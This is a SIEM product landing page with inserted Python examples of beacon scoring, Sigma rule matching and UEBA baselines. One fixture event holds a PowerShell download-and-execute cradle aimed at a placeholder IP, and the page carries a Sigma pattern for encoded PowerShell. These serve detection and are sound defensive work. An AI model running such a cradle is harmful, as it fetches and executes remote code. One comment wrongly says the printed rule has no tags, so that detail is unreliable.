Signal, not story.
A SIEM that tells you what happened in the language of MITRE ATT&CK. Sigma-compatible rules you can read and tune. Case files built in.
title: Suspicious PowerShell
tags:
  - attack.execution
  - attack.t1059.001
logsource:
  product: windows
  category: process_creation
detection:
  selection:
    Image|endswith: powershell.exe
    CommandLine|contains:
      - '-enc'
      - 'IEX'
  condition: selection
level: high
What Sandworm SIEM does.
Sigma-compatible detection content
Read, tune, and write detections in the open Sigma format. No proprietary DSL to learn — your rules are portable from day one.
MITRE ATT&CK native
Every rule is tagged to a MITRE technique. Your coverage heatmap shows exactly which tactics are covered and which are blind spots.
UEBA baseline correlation
User and entity behavior analytics surface deviations from learned baselines. Spot credential abuse, lateral movement, and insider anomalies without writing a rule for every pattern.
C2 detection and beaconing analysis
Built-in correlation logic identifies command-and-control beaconing patterns — periodic callouts, domain-generation algorithms, and protocol tunneling — without requiring manual threshold tuning.
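Two of the beaconing signals named above, periodicity and DGA-like naming, as an added Python example that is not Sandworm's code: connection records are constructed inline, the coefficient of variation of each source/destination pair's inter-arrival gaps measures how regular the callouts are, and the Shannon entropy of the destination label measures how random it looks. The thresholds, host names and the `.example` domains are assumptions for illustration; protocol tunneling is not covered.

```python
"""Added example (not Sandworm's code): beacon periodicity and DGA-likeness
scored over constructed flow records.

A beacon's inter-arrival gaps cluster around one interval, so std/mean stays
small even with jitter; human browsing is bursty and scores high. Random DGA
labels have higher per-character entropy than dictionary words. Thresholds are
fixed here only for illustration."""
import math
import statistics
from collections import Counter, defaultdict

# Constructed flow records: (epoch_seconds, src_host, dst_domain).
# ws01 calls out every ~60 s with a few seconds of jitter; ws02 browses normally.
FLOWS = [(t, "ws01", "xk7q2mzp9wlb.example") for t in (0, 60, 121, 179, 240, 301, 359, 420)] + \
        [(t, "ws02", "news.example") for t in (0, 5, 7, 95, 96, 300, 302, 900)]


def interval_cv(timestamps):
    """std/mean of the inter-arrival gaps: ~0 for a beacon, >1 for bursty traffic.
    Fewer than two gaps (or a zero mean) cannot be scored and returns inf."""
    ts = sorted(timestamps)
    gaps = [b - a for a, b in zip(ts, ts[1:])]
    if len(gaps) < 2 or statistics.mean(gaps) == 0:
        return float("inf")
    return statistics.pstdev(gaps) / statistics.mean(gaps)


def label_entropy(domain):
    """Shannon entropy in bits per character of the leftmost label, TLD ignored."""
    label = domain.split(".")[0].lower()
    n = len(label)
    return -sum(c / n * math.log2(c / n) for c in Counter(label).values())


def analyze(flows, cv_threshold=0.2, entropy_threshold=3.0, min_events=6):
    """Group flows by (src, dst); score pairs with enough events for both signals."""
    by_pair = defaultdict(list)
    for t, src, dst in flows:
        by_pair[(src, dst)].append(t)
    findings = {}
    for (src, dst), ts in by_pair.items():
        if len(ts) < min_events:      # too few samples to judge periodicity
            continue
        cv = interval_cv(ts)
        ent = label_entropy(dst)
        findings[(src, dst)] = {
            "interval_cv": round(cv, 3),
            "label_entropy": round(ent, 3),
            "periodic": cv < cv_threshold,
            "dga_like": ent > entropy_threshold,
        }
    return findings


if __name__ == "__main__":
    for pair, result in analyze(FLOWS).items():
        print(pair, result)
```

The 12-character label has twelve distinct letters, so its entropy is log2(12), about 3.58 bits; "news" scores 2.0. Entropy alone misfires on legitimate CDN and tracking hostnames, which is why it is combined with the timing signal rather than used on its own.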
Streaming detection pipeline
Events flow through the detection engine in near-real-time. The alert fires on the event — not in a nightly batch job.
Case management and evidence preservation
Every fired detection becomes a case with a structured timeline, assigned owner, and raw log evidence. Handoff-ready without cleanup.
Threat hunting in the same interface
Query log history with the same syntax you write detection rules in. No context-switch to a separate hunting tool.
How Sandworm SIEM works
1. Ingest and normalize
Logs arrive from syslog, OCSF-compliant sources, EDRs, identity providers, and cloud audit trails. Sandworm SIEM normalizes each event to a common schema before it enters the detection pipeline.
2. Correlate and score
The streaming correlation engine evaluates every normalized event against your active Sigma rules and the UEBA baseline. Events that match a rule, or that deviate significantly from an entity's learned behavior, are promoted to findings with an assigned severity and MITRE technique tag.
3. Enrich and deduplicate
Findings are enriched with threat-intel context (IP reputation, known C2 infrastructure, hash lookups) and grouped to suppress duplicates before an alert is raised. One case per campaign, not one alert per packet.
4. Surface as a structured case
Each alert opens a case file: timeline of events, contributing raw logs, enrichment data, MITRE coverage tag, and a clear next-action prompt. Assign it, close it, or escalate it, all in Sandworm SIEM.
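The pipeline steps above, as an added Python example that is not Sandworm's code: two constructed raw record formats (hypothetical "sysmon" and "edr" field names) are mapped onto a common schema, the Sigma rule shown at the top of the page is evaluated by a minimal matcher that supports only the modifiers that rule uses (a real engine would use pySigma), each match is tagged with ATT&CK T1059.001 (PowerShell; the tag is an assumption, since the rule as printed carries none), and duplicate findings are grouped into one case per rule, host and user. Threat-intel enrichment is left out.

```python
"""Added example (not Sandworm's code): normalize -> match Sigma rule -> tag -> dedupe
into cases, over constructed process-creation events."""
from collections import defaultdict

# The page's rule as data. T1059.001 (PowerShell) is an assumed tag.
RULE = {
    "title": "Suspicious PowerShell",
    "tags": ["attack.t1059.001"],
    "level": "high",
    "detection": {
        "selection": {
            "Image|endswith": "powershell.exe",
            "CommandLine|contains": ["-enc", "IEX"],
        },
        "condition": "selection",
    },
}

# Constructed raw events from two hypothetical sources with different field names.
RAW_EVENTS = [
    {"src": "sysmon", "Computer": "WS01", "User": "CORP\\alice",
     "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "CommandLine": "powershell.exe -nop -w hidden -EncodedCommand SQBFAFgA"},
    {"src": "sysmon", "Computer": "WS01", "User": "CORP\\alice",
     "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "CommandLine": "powershell.exe -enc SQBFAFgA"},
    {"src": "edr", "hostname": "WS02", "username": "CORP\\bob",
     "process_path": "C:\\Windows\\System32\\cmd.exe",
     "process_cmdline": "cmd.exe /c dir"},
    # PowerShell 7: IEX is present but the image is pwsh.exe, so the rule misses it.
    {"src": "edr", "hostname": "WS02", "username": "CORP\\bob",
     "process_path": "C:\\Program Files\\PowerShell\\7\\pwsh.exe",
     "process_cmdline": "pwsh.exe -c IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.9/a')"},
]

# Source field -> common-schema field (hypothetical mappings).
FIELD_MAPS = {
    "sysmon": {"Computer": "host", "User": "user", "Image": "Image", "CommandLine": "CommandLine"},
    "edr": {"hostname": "host", "username": "user", "process_path": "Image", "process_cmdline": "CommandLine"},
}


def normalize(raw):
    """Step 1: map a source-specific record onto the common schema."""
    return {common: raw[src_field] for src_field, common in FIELD_MAPS[raw["src"]].items()}


def _match_field(spec, value, wanted):
    """One 'Field|modifier: value(s)' entry. Sigma string matching is case-insensitive
    and a list of values is OR'ed."""
    _field, _, modifier = spec.partition("|")
    v = str(value).lower()
    for w in (wanted if isinstance(wanted, list) else [wanted]):
        w = str(w).lower()
        if (modifier == "endswith" and v.endswith(w)) or \
           (modifier == "contains" and w in v) or \
           (modifier == "" and v == w):
            return True
    return False


def sigma_match(rule, event):
    """Step 2: evaluate the rule. Supports only 'condition: selection' with a single
    selection map, whose entries are AND'ed."""
    det = rule["detection"]
    if det["condition"] != "selection":
        raise NotImplementedError("only 'condition: selection' is supported here")
    return all(_match_field(spec, event.get(spec.split("|")[0], ""), wanted)
               for spec, wanted in det["selection"].items())


def run_pipeline(raw_events, rule=RULE):
    """Steps 2-4: findings tagged with severity and technique, grouped into cases
    keyed by (rule, host, user) so repeated hits become one timeline."""
    cases = defaultdict(list)
    for raw in raw_events:
        ev = normalize(raw)
        if sigma_match(rule, ev):
            technique = rule["tags"][0].removeprefix("attack.").upper()   # -> T1059.001
            cases[(rule["title"], ev["host"], ev["user"])].append(
                {"severity": rule["level"], "technique": technique, "evidence": ev})
    return [{"rule": k[0], "host": k[1], "user": k[2],
             "technique": v[0]["technique"], "severity": v[0]["severity"],
             "timeline": [f["evidence"] for f in v]}
            for k, v in cases.items()]


if __name__ == "__main__":
    for case in run_pipeline(RAW_EVENTS):
        print(case["rule"], case["host"], case["user"], case["technique"], len(case["timeline"]), "events")
```

The pwsh.exe event is the kind of gap a readable rule lets you close: `Image|endswith` with a list of both `\powershell.exe` and `\pwsh.exe` (the leading backslash stops `notpowershell.exe` from matching) is a one-line tuning change that a Sigma-in-Git workflow can review in a pull request.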
Built for teams that need answers, not alerts.
SOC analysts managing alert volume
Correlated cases replace raw alert floods. Analysts work the case, not the queue — with all the evidence already assembled.
Detection engineers who want rules in Git
Author Sigma rules, review them in a pull request, and ship them through CI. No GUI-only editor, no vendor lock-in.
Incident responders building the timeline
Every case is a handoff-ready document with a chronological event log. Skip the "what happened first?" reconstruction.
Threat hunters chasing hypotheses
Write ad-hoc queries against the same normalized log store your rules run on. Confirm the hunt hypothesis and promote it to a standing detection in one step.
Integrations
- Syslog/OCSF sources
- EDRs
- Identity providers
- Cloud audit logs
Frequently asked questions
- How is Sandworm SIEM deployed?
Sandworm SIEM ships as a Helm-managed set of Docker containers that run in your own infrastructure or a private cloud tenant. There is no shared multi-tenant data plane — raw logs never leave your environment. A managed-SaaS hosted option is being evaluated for a future release.
- Where does my log data go, and who can access it?
Event data lands in the data-plane components — ClickHouse for time-series log storage, Postgres for case state — that run inside your deployment. Sandworm has no access to your raw event data. Findings and case metadata are scoped to your tenant; no cross-tenant data sharing exists in the architecture.
- How does Sandworm SIEM licensing work?
Sandworm SIEM is included in the Platform and Sovereign bundles and is also available as a standalone à-la-carte product. There is no per-GB ingest charge and no per-alert fee. Full pricing is on the /pricing page.
- What makes this different from a legacy SIEM?
Legacy SIEMs are query engines: logs arrive, you search them later. Sandworm SIEM evaluates every normalized event through a streaming correlation engine the moment it arrives, tags each rule match with a MITRE ATT&CK technique, and opens a structured case automatically — no manual triage step to open a ticket. The UEBA baseline layer adds statistical anomaly detection on top of rule-based detection without requiring a separate product license.
- Does Sandworm SIEM ship with built-in detection content?
Yes. The product ships with a library of Sigma rules spanning common MITRE ATT&CK techniques. Because the rules are in open Sigma format, every detection is human-readable: you can audit the logic, modify thresholds, and submit improvements. Detection logic is never locked in a proprietary bytecode format.
- What UEBA and AI features are coming?
The current UEBA layer computes per-user and per-entity statistical baselines: a mean and standard deviation for each of eight behavioral features, computed per user-day. We are building an integration with Mendicant, our in-house model engine (the engine is still in development; frontier models handle production today), to support natural-language threat-hunting queries (type a hypothesis, get back matching events) and automated hypothesis generation from anomaly clusters. Neither capability is shipping yet.
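A per-user baseline of the kind described above (and under "UEBA baseline correlation" earlier on the page), as an added Python example that is not Sandworm's code: a mean and standard deviation per feature are learned from constructed user-day vectors, a new day is scored as a z-score per feature, and the day is flagged when any feature crosses a threshold. It uses three features instead of the page's eight; the feature names, the 3-sigma threshold and the sample values are assumptions for illustration.

```python
"""Added example (not Sandworm's code): per-user statistical baseline and z-score
scoring over constructed user-day feature vectors."""
import math
import statistics

FEATURES = ("logon_count", "distinct_hosts", "mb_uploaded")   # assumed feature names

# Constructed 10-day learning window for one user with a steady working pattern.
HISTORY = [
    {"logon_count": 4, "distinct_hosts": 2, "mb_uploaded": 12.0},
    {"logon_count": 5, "distinct_hosts": 2, "mb_uploaded": 9.5},
    {"logon_count": 3, "distinct_hosts": 1, "mb_uploaded": 15.0},
    {"logon_count": 4, "distinct_hosts": 2, "mb_uploaded": 11.0},
    {"logon_count": 6, "distinct_hosts": 3, "mb_uploaded": 8.0},
    {"logon_count": 4, "distinct_hosts": 2, "mb_uploaded": 13.5},
    {"logon_count": 5, "distinct_hosts": 2, "mb_uploaded": 10.0},
    {"logon_count": 4, "distinct_hosts": 1, "mb_uploaded": 14.0},
    {"logon_count": 3, "distinct_hosts": 2, "mb_uploaded": 12.5},
    {"logon_count": 5, "distinct_hosts": 2, "mb_uploaded": 11.5},
]


def build_baseline(history, features=FEATURES):
    """Per-feature (mean, sample stdev) over the learning window."""
    return {f: (statistics.mean(d[f] for d in history),
                statistics.stdev(d[f] for d in history)) for f in features}


def score_day(baseline, day):
    """z-score per feature for one user-day. A feature that never varied in the
    window (std == 0) scores 0 if unchanged and +/-inf otherwise, so a change in a
    normally constant feature cannot slip through as 'within one sigma'."""
    zs = {}
    for f, (mean, std) in baseline.items():
        delta = day[f] - mean
        if std == 0:
            zs[f] = 0.0 if delta == 0 else math.copysign(math.inf, delta)
        else:
            zs[f] = delta / std
    return zs


def is_anomalous(zs, threshold=3.0):
    """Names of the features that deviate by at least `threshold` sigma (empty if none)."""
    return [f for f, z in zs.items() if abs(z) >= threshold]


if __name__ == "__main__":
    baseline = build_baseline(HISTORY)
    # Constructed test day: many logons across many hosts plus a large upload,
    # the shape lateral movement followed by exfiltration would leave.
    suspicious = {"logon_count": 31, "distinct_hosts": 14, "mb_uploaded": 2400.0}
    print(is_anomalous(score_day(baseline, suspicious)))
```

Ten days of history is the minimum that makes the standard deviations meaningful; in practice the window also has to be refreshed so that an attacker who stays quiet for a few weeks does not train the baseline to accept them, and users with almost no history need a population-level baseline rather than their own.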
See every detection fire.
We'll run Sandworm SIEM against a replay of your own logs — live.